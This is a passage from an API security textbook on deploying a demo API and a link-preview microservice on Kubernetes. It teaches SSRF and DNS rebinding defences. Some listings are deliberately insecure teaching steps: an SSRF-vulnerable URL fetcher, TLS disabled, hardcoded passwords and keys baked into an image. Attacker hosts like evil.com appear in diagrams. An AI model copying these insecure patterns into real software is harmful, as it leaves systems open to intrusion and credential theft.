First you need to give the service a name and ensure that it runs in the natter-api
namespace. You define which pods are used to implement the service by defining a
selector that matches the label of the pods defined in the deployment. In this case,
you used the label app: natter-database when you defined the deployment, so use
the same label here to make sure the pods are found. Finally, you tell Kubernetes
which ports to expose for the service. In this case, you can expose port 9092. When a
pod tries to connect to the service on port 9092, Kubernetes will forward the request
to the same port on one of the pods that implements the service. If you want to use a
different port, you can use the targetPort attribute to create a mapping between the
service port and the port exposed by the pods. Create a new file named natter-data-
base-service.yaml in the kubernetes folder with the contents of listing 10.4.
apiVersion: v1
kind: Service
Listing 10.4
The database service
Expose the database
server port to other pods.
349
Deploying Natter on Kubernetes
metadata:
name: natter-database-service
namespace: natter-api
spec:
selector:
app: natter-database
ports:
- protocol: TCP
port: 9092
Run
kubectl apply -f kubernetes/natter-database-service.yaml
to configure the service.
10.2.3 Building the Natter API as a Docker container
For building the Natter API container, you can avoid writing a Dockerfile manually
and make use of one of the many Maven plugins that will do this for you automatically.
In this chapter, you’ll use the Jib plugin from Google (https://github.com/Google-
ContainerTools/jib), which requires a minimal amount of configuration to build a
container image.
Listing 10.5 shows how to configure the maven-jib-plugin to build a Docker con-
tainer image for the Natter API. Open the pom.xml file in your editor and add the
whole build section from listing 10.5 to the bottom of the file just before the closing
</project> tag. The configuration instructs Maven to include the Jib plugin in the
build process and sets several configuration options:
Set the name of the output Docker image to build to “apisecurityinaction/
natter-api.”
Set the name of the base image to use. In this case, you can use the distroless Java
11 image provided by Google, just as you did for the H2 Docker image.
Pop quiz
3
Which of the following are best practices for securing containers in Kubernetes?
Select all answers that apply.
a
Running as a non-root user
b
Disallowing privilege escalation
c
Dropping all unused Linux capabilities
d
Marking the root filesystem as read-only
e
Using base images with the most downloads on Docker Hub
f
Applying sandboxing features such as AppArmor or seccomp
The answer is at the end of the chapter.
Give the service a name in
the natter-api namespace.
Select the pods that implement
the service using labels.
Expose the
database port.
350
CHAPTER 10
Microservice APIs in Kubernetes
Set the name of the main class to run when the container is launched. If there is
only one main method in your project, then you can leave this out.
Configure any additional JVM settings to use when starting the process. The
default settings are fine, but as discussed in chapter 5, it is worth telling Java to
prefer to use the /dev/urandom device for seeding SecureRandom instances to
avoid potential performance issues. You can do this by setting the java.security
.egd system property.
Configure the container to expose port 4567, which is the default port that our
API server will listen to for HTTP connections.
Finally, configure the container to run processes as a non-root user and group.
In this case you can use a user with UID (user ID) and GID (group ID) of 1000.
<build>
<plugins>
<plugin>
<groupId>com.google.cloud.tools</groupId>
<artifactId>jib-maven-plugin</artifactId>
<version>2.4.0</version>
<configuration>
<to>

</to>
<from>

</from>
<container>
<mainClass>${exec.mainClass}</mainClass>
<jvmFlags>
<jvmFlag>-Djava.security.egd=file:/dev/urandom</jvmFlag>
</jvmFlags>
<ports>
<port>4567</port>
</ports>
<user>1000:1000</user>
</container>
</configuration>
</plugin>
</plugins>
</build>
Before you build the Docker image, you should first disable TLS because this avoids
configuration issues that will need to be resolved to get TLS working in the cluster.
You will learn how to re-enable TLS between microservices in section 10.3. Open
Main.java in your editor and find the call to the secure() method. Comment out (or
delete) the method call as follows:
//secure("localhost.p12", "changeit", null, null);
Listing 10.5
Enabling the Jib Maven plugin
Use the latest version of
the jib-maven-plugin.
Provide a name
for the generated
Docker image.
Use a minimal base
image to reduce the
size and attack surface.
Specify the main
class to run.
Add any
custom JVM
settings.
Expose the port that the
API server listens to so that
clients can connect.
Specify a non-root
user and group to
run the process.
Comment out the secure()
method to disable TLS.
351
Deploying Natter on Kubernetes
The API will still need access to the keystore for any HMAC or AES encryption keys. To
ensure that the keystore is copied into the Docker image, navigate to the src/main
folder in the project and create a new folder named “jib.” Copy the keystore.p12 file
from the root of the project to the src/main/jib folder you just created. The jib-maven-
plugin will automatically copy files in this folder into the Docker image it creates.
WARNING
Copying the keystore and keys directly into the Docker image is
poor security because anyone who downloads the image can access your
secret keys. In chapter 11, you’ll see how to avoid including the keystore in
this way and ensure that you use unique keys for each environment that your
API runs in.
You also need to change the JDBC URL that the API uses to connect to the database.
Rather than creating a local in-memory database, you can instruct the API to connect
to the H2 database service you just deployed. To avoid having to create a disk volume
to store data files, in this example you’ll continue using an in-memory database run-
ning on the database pod. This is as simple as replacing the current JDBC database
URL with the following one, using the DNS name of the database service you cre-
ated earlier:
jdbc:h2:tcp://natter-database-service:9092/mem:natter
Open the Main.java file and replace the existing JDBC URL with the new one in the
code that creates the database connection pool. The new code should look as shown
in listing 10.6.
var jdbcUrl =
"jdbc:h2:tcp://natter-database-service:9092/mem:natter";
var datasource = JdbcConnectionPool.create(
jdbcUrl, "natter", "password");
createTables(datasource.getConnection());
datasource = JdbcConnectionPool.create(
jdbcUrl, "natter_api_user", "password");
var database = Database.forDataSource(datasource);
To build the Docker image for the Natter API with Jib, you can then simply run the fol-
lowing Maven command in the same shell in the root folder of the natter-api project:
mvn clean compile jib:dockerBuild
You can now create a deployment to run the API in the cluster. Listing 10.7 shows the
deployment configuration, which is almost identical to the H2 database deployment
you created in the last section. Apart from specifying a different Docker image to run,
you should also make sure you attach a different label to the pods that form this
deployment. Otherwise, the new pods will be included in the database deployment.
Listing 10.6
Connecting to the remote H2 database
Use the DNS name
of the remote
database service.
Use the same JDBC URL when
creating the schema and when
switching to the Natter API user.
352
CHAPTER 10
Microservice APIs in Kubernetes
Create a new file named natter-api-deployment.yaml in the kubernetes folder with the
contents of the listing.
apiVersion: apps/v1
kind: Deployment
metadata:
name: natter-api-deployment
namespace: natter-api
spec:
selector:
matchLabels:
app: natter-api
replicas: 1
template:
metadata:
labels:
app: natter-api
spec:
securityContext:
runAsNonRoot: true
containers:
- name: natter-api
image: apisecurityinaction/natter-api:latest
imagePullPolicy: Never
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
capabilities:
drop:
- all
ports:
- containerPort: 4567
Run the following command to deploy the code:
kubectl apply -f kubernetes/natter-api-deployment.yaml
The API server will start and connect to the database service.
The last step is to also expose the API as a service within Kubernetes so that you
can connect to it. For the database service, you didn’t specify a service type so Kuber-
netes deployed it using the default ClusterIP type. Such services are only accessible
within the cluster, but you want the API to be accessible from external clients, so you
need to pick a different service type. The simplest alternative is the NodePort service
type, which exposes the service on a port on each node in the cluster. You can then
connect to the service using the external IP address of any node in the cluster.
Use the nodePort attribute to specify which port the service is exposed on, or leave
it blank to let the cluster pick a free port. The exposed port must be in the range
30000–32767. In section 10.4, you’ll deploy an ingress controller for a more controlled
Listing 10.7
The Natter API deployment
Give the API deployment a
unique name.
Ensure the labels for
the pods are different
from the database
pod labels.
Use the Docker
image that you
built with Jib.
Expose the
port that the
server runs on.
353
Deploying Natter on Kubernetes
approach to allowing connections from external clients. Create a new file named
natter-api-service.yaml in the kubernetes folder with the contents of listing 10.8.
apiVersion: v1
kind: Service
metadata:
name: natter-api-service
namespace: natter-api
spec:
type: NodePort
selector:
app: natter-api
ports:
- protocol: TCP
port: 4567
nodePort: 30567
Now run the command kubectl apply -f kubernetes/natter-api-service.yaml to
start the service. You can then run the following to get a URL that you can use with
curl to interact with the service:
$ minikube service --url natter-api-service --namespace=natter-api
This will produce output like the following:
http://192.168.99.109:30567
You can then use that URL to access the API as in the following example:
$ curl -X POST -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}' \
http://192.168.99.109:30567/users
{"username":"test"}
You now have the API running in Kubernetes.
10.2.4 The link-preview microservice
You have Docker images for the Natter API and the H2 database deployed and run-
ning in Kubernetes, so it’s now time to develop the link-preview microservice. To sim-
plify development, you can create the new microservice within the existing Maven
project and reuse the existing classes.
NOTE
The implementation in this chapter is extremely naïve from a perfor-
mance and scalability perspective and is intended only to demonstrate API
security techniques within Kubernetes.
To implement the service, you can use the jsoup library (https://jsoup.org) for Java,
which simplifies fetching and parsing HTML pages. To include jsoup in the project,
Listing 10.8
Exposing the API as a service
Specify the type as
NodePort to allow
external connections.
Specify the port to expose on
each node; it must be in the
range 30000–32767.
354
CHAPTER 10
Microservice APIs in Kubernetes
open the pom.xml file in your editor and add the following lines to the <dependen-
cies> section:
<dependency>
<groupId>org.jsoup</groupId>
<artifactId>jsoup</artifactId>
<version>1.13.1</version>
</dependency>
An implementation of the microservice is shown in listing 10.9. The API exposes a sin-
gle operation, implemented as a GET request to the /preview endpoint with the URL
from the link as a query parameter. You can use jsoup to fetch the URL and parse the
HTML that is returned. Jsoup does a good job of ensuring the URL is a valid HTTP or
HTTPS URL, so you can skip performing those checks yourself and instead register
Spark exception handlers to return an appropriate response if the URL is invalid or
cannot be fetched for any reason.
WARNING
If you process URLs in this way, you should ensure that an attacker
can’t submit file:// URLs and use this to access protected files on the API
server disk. Jsoup strictly validates that the URL scheme is HTTP before load-
ing any resources, but if you use a different library you should check the doc-
umentation or perform your own validation.
After jsoup fetches the HTML page, you can use the selectFirst method to find
metadata tags in the document. In this case, you’re interested in the following tags:
The document title.
The Open Graph description property, if it exists. This is represented in the
HTML as a <meta> tag with the property attribute set to og:description.
The Open Graph image property, which will provide a link to a thumbnail
image to accompany the preview.
You can also use the doc.location() method to find the URL that the document was
finally fetched from just in case any redirects occurred. Navigate to the src/main/
java/com/manning/apisecurityinaction folder and create a new file named Link-
Previewer.java. Copy the contents of listing 10.9 into the file and save it.
WARNING
This implementation is vulnerable to server-side request forgery (SSRF)
attacks. You’ll mitigate these issues in section 10.2.7.
package com.manning.apisecurityinaction;
import java.net.*;
import org.json.JSONObject;
import org.jsoup.Jsoup;
Listing 10.9
The link-preview microservice
355
Deploying Natter on Kubernetes
import org.slf4j.*;
import spark.ExceptionHandler;
import static spark.Spark.*;
public class LinkPreviewer {
private static final Logger logger =
LoggerFactory.getLogger(LinkPreviewer.class);
public static void main(String...args) {
afterAfter((request, response) -> {
response.type("application/json; charset=utf-8");
});
get("/preview", (request, response) -> {
var url = request.queryParams("url");
var doc = Jsoup.connect(url).timeout(3000).get();
var title = doc.title();
var desc = doc.head()
.selectFirst("meta[property='og:description']");
var img = doc.head()
.selectFirst("meta[property='og:image']");
return new JSONObject()
.put("url", doc.location())
.putOpt("title", title)
.putOpt("description",
desc == null ? null : desc.attr("content"))
.putOpt("image",
img == null ? null : img.attr("content"));
});
exception(IllegalArgumentException.class, handleException(400));
exception(MalformedURLException.class, handleException(400));
exception(Exception.class, handleException(502));
exception(UnknownHostException.class, handleException(404));
}
private static <T extends Exception> ExceptionHandler<T>
handleException(int status) {
return (ex, request, response) -> {
logger.error("Caught error {} - returning status {}",
ex, status);
response.status(status);
response.body(new JSONObject()
.put("status", status).toString());
};
}
}
10.2.5 Deploying the new microservice
To deploy the new microservice to Kubernetes, you need to first build the link-preview
microservice as a Docker image, and then create a new Kubernetes deployment and
service configuration for it. You can reuse the existing jib-maven-plugin the build the
Because this
service will only
be called by other
services, you can
omit the browser
security headers.
Extract
metadata
properties from
the HTML.
Produce a JSON
response, taking
care with
attributes that
might be null.
Return
appropriate
HTTP status
codes if jsoup
raises an
exception.
356
CHAPTER 10
Microservice APIs in Kubernetes
Docker image, overriding the image name and main class on the command line.
Open a terminal in the root folder of the Natter API project and run the following
commands to build the image to the Minikube Docker daemon. First, ensure the envi-
ronment is configured correctly by running:
eval $(minikube docker-env)
Then use Jib to build the image for the link-preview service:
mvn clean compile jib:dockerBuild \
-Djib.to.image=apisecurityinaction/link-preview \
-Djib.container.mainClass=com.manning.apisecurityinaction.
➥ LinkPreviewer
You can then deploy the service to Kubernetes by applying a deployment configura-
tion, as shown in listing 10.10. This is a copy of the deployment configuration used for
the main Natter API, with the pod names changed and updated to use the Docker
image that you just built. Create a new file named kubernetes/natter-link-preview-
deployment.yaml using the contents of listing 10.10.
apiVersion: apps/v1
kind: Deployment
metadata:
name: link-preview-service-deployment
namespace: natter-api
spec:
selector:
matchLabels:
app: link-preview-service
replicas: 1
template:
metadata:
labels:
app: link-preview-service
spec:
securityContext:
runAsNonRoot: true
containers:
- name: link-preview-service
image: apisecurityinaction/link-preview-service:latest
imagePullPolicy: Never
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
capabilities:
drop:
- all
ports:
- containerPort: 4567
Listing 10.10
The link-preview service deployment
Give the pods the
name link-preview-
service.
Use the link-
preview-service
Docker image
you just built.
357
Deploying Natter on Kubernetes
Run the following command to create the new deployment:
kubectl apply -f \
kubernetes/natter-link-preview-deployment.yaml
To allow the Natter API to locate the new service, you should also create a new Kuber-
netes service configuration for it. Listing 10.11 shows the configuration for the new
service, selecting the pods you just created and exposing port 4567 to allow access to
the API. Create the file kubernetes/natter-link-preview-service.yaml with the contents
of the new listing.
apiVersion: v1
kind: Service
metadata:
name: natter-link-preview-service
namespace: natter-api
spec:
selector:
app: link-preview
ports:
- protocol: TCP
port: 4567
Run the following command to expose the service within the cluster:
kubectl apply -f kubernetes/natter-link-preview-service.yaml
10.2.6 Calling the link-preview microservice
The ideal place to call the link-preview service is when a message is initially posted to the
Natter API. The preview data can then be stored in the database along with the message
and served up to all users. For simplicity, you can instead call the service when reading a
message. This is very inefficient because the preview will be regenerated every time the
message is read, but it is convenient for the purpose of demonstration.
The code to call the link-preview microservice is shown in listing 10.12. Open the
SpaceController.java file and add the following imports to the top:
import java.net.*;
import java.net.http.*;
import java.net.http.HttpResponse.BodyHandlers;
import java.nio.charset.StandardCharsets;
import java.util.*;
import java.util.regex.Pattern;
Then add the fields and new method defined in the listing. The new method takes
a link, extracted from a message, and calls the link-preview service passing the link
URL as a query parameter. If the response is successful, then it returns the link-
preview JSON.
Listing 10.11
The link-preview service configuration
Give the service
a name.
Make sure to use the matching
label for the deployment pods.
Expose port 4567 that
the API will run on.
358
CHAPTER 10
Microservice APIs in Kubernetes
private final HttpClient httpClient = HttpClient.newHttpClient();
private final URI linkPreviewService = URI.create(
"http://natter-link-preview-service:4567");
private JSONObject fetchLinkPreview(String link) {
var url = linkPreviewService.resolve("/preview?url=" +
URLEncoder.encode(link, StandardCharsets.UTF_8));
var request = HttpRequest.newBuilder(url)
.GET()
.build();
try {
var response = httpClient.send(request,
BodyHandlers.ofString());
if (response.statusCode() == 200) {
return new JSONObject(response.body());
}
} catch (Exception ignored) { }
return null;
}
To return the links from the Natter API, you need to update the Message class used to
represent a message read from the database. In the SpaceController.java file, find the
Message class definition and update it to add a new links field containing a list of link
previews, as shown in listing 10.13.
TIP
If you haven’t added support for reading messages to the Natter API,
you can download a fully implemented API from the GitHub repository
accompanying the book: https://github.com/NeilMadden/apisecurityinaction.
Check out the chapter10 branch for a starting point, or chapter10-end for the
completed code.
public static class Message {
private final long spaceId;
private final long msgId;
private final String author;
private final Instant time;
private final String message;
private final List<JSONObject> links = new ArrayList<>();
public Message(long spaceId, long msgId, String author,
Instant time, String message) {
this.spaceId = spaceId;
this.msgId = msgId;
this.author = author;
this.time = time;
this.message = message;
}
Listing 10.12
Fetching a link preview
Listing 10.13
Adding links to a message
Construct a HttpClient and a constant for the microservice URI.
Create a GET
request to the
service, passing
the link as the url
query parameter.
If the response is
successful, then return
the JSON link preview.
Add a list of
link previews
to the class.
359
Deploying Natter on Kubernetes
@Override
public String toString() {
JSONObject msg = new JSONObject();
msg.put("uri",
"/spaces/" + spaceId + "/messages/" + msgId);
msg.put("author", author);
msg.put("time", time.toString());
msg.put("message", message);
msg.put("links", links);
return msg.toString();
}
}
Finally, you can update the readMessage method to scan the text of a message for
strings that look like URLs and fetch a link preview for those links. You can use a
regular expression to search for potential links in the message. In this case, you’ll
just look for any strings that start with http:/ / or https:/ /, as shown in listing 10.14.
Once a potential link has been found, you can use the fetchLinkPreview method
you just wrote to fetch the link preview. If the link was valid and a preview was
returned, then add the preview to the list of links on the message. Update the read-
Message method in the SpaceController.java file to match listing 10.14. The new
code is highlighted in bold.
public Message readMessage(Request request, Response response) {
var spaceId = Long.parseLong(request.params(":spaceId"));
var msgId = Long.parseLong(request.params(":msgId"));
var message = database.findUnique(Message.class,
"SELECT space_id, msg_id, author, msg_time, msg_text " +
"FROM messages WHERE msg_id = ? AND space_id = ?",
msgId, spaceId);
var linkPattern = Pattern.compile("https?://\\S+");
var matcher = linkPattern.matcher(message.message);
int start = 0;
while (matcher.find(start)) {
var url = matcher.group();
var preview = fetchLinkPreview(url);
if (preview != null) {
message.links.add(preview);
}
start = matcher.end();
}
response.status(200);
return message;
}
Listing 10.14
Scanning messages for links
Return the links as
a new field on the
message response.
Use a regular
expression to find
links in the message.
Send each link to
the link-preview
service.
If it was valid, then add
the link preview to the
links list in the message.
360
CHAPTER 10
Microservice APIs in Kubernetes
You can now rebuild the Docker image by running the following command in a termi-
nal in the root folder of the project (make sure to set up the Docker environment
again if this is a new terminal window):
mvn clean compile jib:dockerBuild
Because the image is not versioned, Minikube won’t automatically pick up the new
image. The simplest way to use the new image is to restart Minikube, which will reload
all the images from the Docker daemon:1
minikube stop
and then
minikube start
You can now try out the link-preview service. Use the minikube ip command to get the
IP address to use to connect to the service. First create a user:
curl http://$(minikube ip):30567/users \
-H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}'
Next, create a social space and extract the message read-write capability URI into a
variable:
MSGS_URI=$(curl http://$(minikube ip):30567/spaces \
-H 'Content-Type: application/json' \
-d '{"owner":"test","name":"test space"}' \
-u test:password | jq -r '."messages-rw"')
You can now create a message with a link to a HTML story in it:
MSG_LINK=$(curl http://$(minikube ip):30567$MSGS_URI \
-u test:password \
-H 'Content-Type: application/json' \
-d '{"author":"test", "message":"Check out this link:
➥ http://www.bbc.co.uk/news/uk-scotland-50435811"}' | jq -r .uri)
Finally, you can retrieve the message to see the link preview:
curl -u test:password http://$(minikube ip):30567$MSG_LINK | jq
The output will look like the following:
{
"author": "test",
"links": [
1 Restarting Minikube will also delete the contents of the database as it is still purely in-memory. See
http://mng.bz/5pZ1 for details on how to enable persistent disk volumes that survive restarts.
361
Deploying Natter on Kubernetes
{
"image":
➥ "https://ichef.bbci.co.uk/news/1024/branded_news/128FC/
➥ production/_109682067_brash_tracks_on_fire_dyke_2019.
➥ creditpaulturner.jpg",
"description": "The massive fire in the Flow Country in May
➥ doubled Scotland's greenhouse gas emissions while it burnt.",
"title": "Huge Flow Country wildfire 'doubled Scotland's
➥ emissions' - BBC News",
"url": "https://www.bbc.co.uk/news/uk-scotland-50435811"
}
],
"time": "2019-11-18T10:11:24.944Z",
"message": "Check out this link:
➥ http://www.bbc.co.uk/news/uk-scotland-50435811"
}
10.2.7 Preventing SSRF attacks
The link-preview service currently has a large security flaw, because it allows anybody
to submit a message with a link that will then be loaded from inside the Kubernetes
network. This opens the application up to a server-side request forgery (SSRF) attack,
where an attacker crafts a link that refers to an internal service that isn’t accessible
from outside the network, as shown in figure 10.4.
DEFINITION
A server-side request forgery attack occurs when an attacker can sub-
mit URLs to an API that are then loaded from inside a trusted network. By
submitting URLs that refer to internal IP addresses the attacker may be able
to discover what services are running inside the network or even to cause
side effects.
SSRF attacks can be devastating in some cases. For example, in July 2019, Capital One,
a large financial services company, announced a data breach that compromised user
details, Social Security numbers, and bank account numbers (http://mng.bz/6AmD).
Analysis of the attack (https://ejj.io/blog/capital-one) showed that the attacker
exploited a SSRF vulnerability in a Web Application Firewall to extract credentials
from the AWS metadata service, which is exposed as a simple HTTP server available
on the local network. These credentials were then used to access secure storage buck-
ets containing the user data.
Although the AWS metadata service was attacked in this case, it is far from the first
service to assume that requests from within an internal network are safe. This used to
be a common assumption for applications installed inside a corporate firewall, and
you can still find applications that will respond with sensitive data to completely unau-
thenticated HTTP requests. Even critical elements of the Kubernetes control plane,
such as the etcd database used to store cluster configuration and service credentials,
can sometimes be accessed via unauthenticated HTTP requests (although this is usu-
ally disabled). The best defense against SSRF attacks is to require authentication for
362
CHAPTER 10
Microservice APIs in Kubernetes
access to any internal services, regardless of whether the request originated from an
internal network: an approach known as zero trust networking.
DEFINITION
A zero trust network architecture is one in which requests to ser-
vices are not trusted purely because they come from an internal network.
Instead, all API requests should be actively authenticated using techniques
such as those described in this book. The term originated with Forrester
Research and was popularized by Google’s BeyondCorp enterprise architec-
ture (https://cloud.google.com/beyondcorp/). The term has now become a
marketing buzzword, with many products promising a zero-trust approach,
but the core idea is still valuable.
Although implementing a zero-trust approach throughout an organization is ideal,
this can’t always be relied upon, and a service such as the link-preview microservice
shouldn’t assume that all requests are safe. To prevent the link-preview service being
Link-preview API
Target service
IP: 192.168.0.1
Firewall
url=http://192.168.0.1/admin
GET/admin
In an SSRF attack, an attacker
outside the firewall makes a request
with a URL of an internal service.
The API doesn’t validate the
URL and so makes a request
to the internal service.
SSRF can be used to steal
credentials, scan internal networks,
or even directly call APIs.
Figure 10.4
In an SSRF attack, the attacker sends a URL to a vulnerable API
that refers to an internal service. If the API doesn’t validate the URL, it will make
a request to the internal service that the attacker couldn’t make themselves.
This may allow the attacker to probe internal services for vulnerabilities, steal
credentials returned from these endpoints, or directly cause actions via
vulnerable APIs.
363
Deploying Natter on Kubernetes
abused for SSRF attacks, you should validate URLs passed to the service before mak-
ing a HTTP request. This validation can be done in two ways:
You can check the URLs against a set of allowed hostnames, domain names, or
(ideally) strictly match the entire URL. Only URLs that match the allowlist are
allowed. This approach is the most secure but is not always feasible.
You can block URLs that are likely to be internal services that should be pro-
tected. This is less secure than allowlisting for several reasons. First, you may for-
get to blocklist some services. Second, new services may be added later without
the blocklist being updated. Blocklisting should only be used when allowlisting
is not an option.
For the link-preview microservice, there are too many legitimate websites to have a
hope of listing them all, so you’ll fall back on a form of blocklisting: extract the host-
name from the URL and then check that the IP address does not resolve to a private
IP address. There are several classes of IP addresses that are never valid targets for a
link-preview service:
Any loopback address, such as 127.0.0.1, which always refers to the local machine.
Allowing requests to these addresses might allow access to other containers run-
ning in the same pod.
Any link-local IP address, which are those starting 169.254 in IPv4 or fe80 in
IPv6. These addresses are reserved for communicating with hosts on the same
network segment.
Private-use IP address ranges, such as 10.x.x.x or 169.198.x.x in IPv4, or site-local
IPv6 addresses (starting fec0 but now deprecated), or IPv6 unique local addresses
(starting fd00). Nodes and pods within a Kubernetes network will normally
have a private-use IPv4 address, but this can be changed.
Addresses that are not valid for use with HTTP, such as multicast addresses or
the wildcard address 0.0.0.0.
Listing 10.15 shows how to check for URLs that resolve to local or private IP addresses
using Java’s java.net.InetAddress class. This class can handle both IPv4 and IPv6
addresses and provides helper methods to check for most of the types of IP address
listed previously. The only check it doesn’t do is for the newer unique local addresses
that were a late addition to the IPv6 standards. It is easy to check for these yourself
though, by checking if the address is an instance of the Inet6Address class and if the
first two bytes of the raw address are the values 0xFD and 0x00. Because the hostname
in a URL may resolve to more than one IP address, you should check each address
using InetAddress.getAllByName(). If any address is private-use, then the code rejects
the request. Open the LinkPreviewService.java file and add the two new methods
from listing 10.15 to the file.
364
CHAPTER 10
Microservice APIs in Kubernetes
private static boolean isBlockedAddress(String uri)
throws UnknownHostException {
var host = URI.create(uri).getHost();
for (var ipAddr : InetAddress.getAllByName(host)) {
if (ipAddr.isLoopbackAddress() ||
ipAddr.isLinkLocalAddress() ||
ipAddr.isSiteLocalAddress() ||
ipAddr.isMulticastAddress() ||
ipAddr.isAnyLocalAddress() ||
isUniqueLocalAddress(ipAddr)) {
return true;
}
}
return false;
}
private static boolean isUniqueLocalAddress(InetAddress ipAddr) {
return ipAddr instanceof Inet6Address &&
(ipAddr.getAddress()[0] & 0xFF) == 0xFD &&
(ipAddr.getAddress()[1] & 0xFF) == 0X00;
}
You can now update the link-preview operation to reject requests using a URL that
resolves to a local address by changing the implementation of the GET request han-
dler to reject requests for which isBlockedAddress returns true. Find the definition
of the GET handler in the LinkPreviewService.java file and add the check as shown
below in bold:
get("/preview", (request, response) -> {
var url = request.queryParams("url");
if (isBlockedAddress(url)) {
throw new IllegalArgumentException(
"URL refers to local/private address");
}
Although this change prevents the most obvious SSRF attacks, it has some limitations:
You’re checking only the original URL that was provided to the service, but
jsoup by default will follow redirects. An attacker can set up a public website
such as http:/ /evil.example.com, which returns a HTTP redirect to an internal
address inside your cluster. Because only the original URL is validated (and
appears to be a genuine site), jsoup will end up following the redirect and fetch-
ing the internal site.
Even if you allowlist a set of known good websites, an attacker may be able to
find an open redirect vulnerability on one of those sites that allows them to pull off
the same trick and redirect jsoup to an internal address.
Listing 10.15
Checking for local IP addresses
Extract the hostname
from the URI.
Check all IP
addresses for
this hostname.
Check if the
IP address is
any local- or
private-use type.
Otherwise,
return false.
To check for IPv6 unique local addresses,
check the first two bytes of the raw address.
365
Deploying Natter on Kubernetes
DEFINITION
An open redirect vulnerability occurs when a legitimate website can
be tricked into issuing a HTTP redirect to a URL supplied by the attacker. For
example, many login services (including OAuth2) accept a URL as a query
parameter and redirect the user to that URL after authentication. Such
parameters should always be strictly validated against a list of allowed URLs.
You can ensure that redirect URLs are validated for SSRF attacks by disabling the
automatic redirect handling behavior in jsoup and implementing it yourself, as shown
in listing 10.16. By calling followRedirects(false) the built-in behavior is pre-
vented, and jsoup will return a response with a 3xx HTTP status code when a redirect
occurs. You can then retrieve the redirected URL from the Location header on the
response. By performing the URL validation inside a loop, you can ensure that all
redirects are validated, not just the first URL. Make sure you define a limit on the num-
ber of redirects to prevent an infinite loop. When the request returns a non-redirect
response, you can parse the document and process it as before. Open the Link-
Previewer.java file and add the method from listing 10.16.
private static Document fetch(String url) throws IOException {
Document doc = null;
int retries = 0;
while (doc == null && retries++ < 10) {
if (isBlockedAddress(url)) {
throw new IllegalArgumentException(
"URL refers to local/private address");
}
var res = Jsoup.connect(url).followRedirects(false)
.timeout(3000).method(GET).execute();
if (res.statusCode() / 100 == 3) {
url = res.header("Location");
} else {
doc = res.parse();
}
}
if (doc == null) throw new IOException("too many redirects");
return doc;
}
Update the request handler to call the new method instead of call jsoup directly. In
the handler for GET requests to the /preview endpoint, replace the line that cur-
rently reads
var doc = Jsoup.connect(url).timeout(3000).get();
with the following call to the new fetch"method:
var doc = fetch(url);
Listing 10.16
Validating redirects
Loop until the URL resolves to a document.
Set a limit on the number of redirects.
If any URL resolves
to a private-use IP
address, then reject
the request.
Disable
automatic
redirect
handling in
jsoup.
If the site returns a
redirect status code
(3xx in HTTP), then
update the URL.
Otherwise,
parse the
returned
document.
366
CHAPTER 10
Microservice APIs in Kubernetes
10.2.8 DNS rebinding attacks
A more sophisticated SSRF attack, which can defeat validation of redirects, is a DNS
rebinding attack, in which an attacker sets up a website and configures the DNS server
for the domain to a server under their control (figure 10.5). When the validation code
looks up the IP address, the DNS server returns a genuine external IP address with a
very short time-to-live value to prevent the result being cached. After validation has
succeeded, jsoup will perform another DNS lookup to actually connect to the website.
For this second lookup, the attacker’s DNS server returns an internal IP address, and
so jsoup attempts to connect to the given internal service.
DEFINITION
A DNS rebinding attack occurs when an attacker sets up a fake web-
site that they control the DNS for. After initially returning a correct IP address
to bypass any validation steps, the attacker quickly switches the DNS settings to
return the IP address of an internal service when the actual HTTP call is made.
Although it is hard to prevent DNS rebinding attacks when making an HTTP request,
you can prevent such attacks against your APIs in several ways:
Strictly validate the Host header in the request to ensure that it matches the
hostname of the API being called. The Host header is set by clients based on
the URL that was used in the request and will be wrong if a DNS rebinding
attack occurs. Most web servers and reverse proxies provide configuration
options to explicitly verify the Host header.
By using TLS for all requests. In this case, the TLS certificate presented by the
target server won’t match the hostname of the original request and so the TLS
authentication handshake will fail.
Many DNS servers and firewalls can also be configured to block potential DNS
binding attacks for an entire network by filtering out external DNS responses
that resolve to internal IP addresses.
Listing 10.17 shows how to validate the host header in Spark Java by checking it
against a set of valid values. Each service can be accessed within the same namespace
Pop quiz
4
Which one of the following is the most secure way to validate URLs to prevent
SSRF attacks?
a
Only performing GET requests
b
Only performing HEAD requests
c
Blocklisting private-use IP addresses
d
Limiting the number of requests per second
e
Strictly matching the URL against an allowlist of known safe values
The answer is at the end of the chapter.
367
Deploying Natter on Kubernetes
using the short service name such as natter-api-service, or from other namespaces
in the cluster using a name like natter-api-service.natter-api. Finally, they will
also have a fully qualified name, which by default ends in .svc.cluster.local. Add
this filter to the Natter API and the link-preview microservice to prevent attacks
against those services. Open the Main.java file and add the contents of the listing to
the main method, just after the existing rate-limiting filter you added in chapter 3.
Add the same code to the LinkPreviewer class.
var expectedHostNames = Set.of(
"api.natter.com",
"api.natter.com:30567",
"natter-link-preview-service:4567",
"natter-link-preview-service.natter-api:4567",
"natter-link-preview-service.natter-api.svc.cluster.local:4567");
Listing 10.17
Validating the Host header
Link-preview API
Target service
IP: 192.168.0.1
url=http://evil.com/admin
Attacker-
controlled DNS
DNS lookup: evil.com
1: Real evil.com IP address, ttl=0
2: 192.168.0.1
1. In a DNS rebinding attack, the
attacker sends a URL that refers
to a domain under their control.
2. When the API validates the URL,
the attacker’s DNS server returns
the correct IP address. But when it
makes a second query, it returns the
IP address of an internal service.
3. Because the URL validated the
API will make a request to
the internal service.
Figure 10.5
In a DNS rebinding attack, the attacker submits a URL referring
to a domain under their control. When the API performs a DNS lookup during
validation, the attacker’s DNS server returns a legitimate IP address with a
short time-to-live (ttl). Once validation has succeeded, the API performs a
second DNS lookup to make the HTTP request, and the attacker’s DNS server
returns the internal IP address, causing the API to make an SSRF request even
though it validated the URL.
Define all valid
hostnames for
your API.
368
CHAPTER 10
Microservice APIs in Kubernetes
before((request, response) -> {
if (!expectedHostNames.contains(request.host())) {
halt(400);
}
});
If you want to be able to call the Natter API from curl, you’ll also need to add the
external Minikube IP address and port, which you can get by running the command,
minikube ip. For example, on my system I needed to add
"192.168.99.116:30567"
to the allowed host values in Main.java.
TIP
You can create an alias for the Minikube IP address in the /etc/hosts file
on Linux or MacOS by running the command sudo sh -c "echo '$(minikube
ip) api.natter.local' >> /etc/hosts. On Windows, create or edit the file
under C:\Windows\system32\etc\hosts and add a line with the IP address a
space and the hostname. You can then make curl calls to http:/ /api.natter
.local:30567 rather than using the IP address.
10.3
Securing microservice communications
